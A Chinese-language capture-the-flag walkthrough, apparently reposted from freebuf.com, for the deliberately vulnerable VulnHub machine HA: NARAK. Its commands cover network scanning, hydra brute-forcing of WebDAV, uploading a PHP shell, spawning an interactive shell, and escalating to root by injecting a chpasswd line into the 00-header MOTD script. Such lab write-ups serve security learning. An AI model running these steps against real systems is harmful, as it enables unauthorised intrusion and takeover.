VulnHub靶场之HA: NARAK – 作者:Rexays

kali地址:192.168.124.21

靶机地址:192.168.124.25

扫描存活主机ip:arp-scan 192.168.124.0/24

图片[1]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科扫描主机开放端口:nmap 192.168.124.25 -p 1-65535

发现开放80端口和22端口,猜测可进行ssh爆破

图片[2]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科

访问80端口:查看网页内容

图片[3]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科使用cewl生成字典:cewl 192.168.124.25 -w 123.txt

图片[4]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科进行目录扫描:dirb http://192.168.124.25/usr/share/wordlists/dirb/big.txt

发现webdav路径,webdav是一种基于 HTTP 1.1协议的通信协议

图片[5]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科

对该目录进行爆破:hydra -L 用户名字典 -P 密码字典 http-get /webdav

成功爆破:用户名:yamdoot 密码:Swarg

图片[6]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科

访问webdav,输入用户名密码登录成功:可进行文件上传(此处已上传shell.php文件)

图片[7]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科上传shell.php文件:cadaver http://192.168.124.25/webdav/

图片[8]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科使用msf反弹shell:反弹成功

获取交互式shell:python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

图片[9]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科浏览文件发现hell.sh文件,查看后发现神秘代码,破解后得到密码:chitragupt

并发现三个用户

图片[10]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科对inferno用户进行ssh登录,登录成功。查看user.txt找到第一个Flag,但并非root权限

图片[11]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科浏览文件内容时发现00-header配置文件,修改root密码:echo “echo ‘root:admin’ | sudo chpasswd” >> 00-header

图片[12]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科重新登录inferno用户,su root输入新密码。提权成功,找到Root Flag!

图片[13]-VulnHub靶场之HA: NARAK – 作者:Rexays-安全小百科

总结:渗透的本质就是信息收集!Information Gathering永远滴神!

来源:freebuf.com 2020-10-08 22:11:12 by: Rexays

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论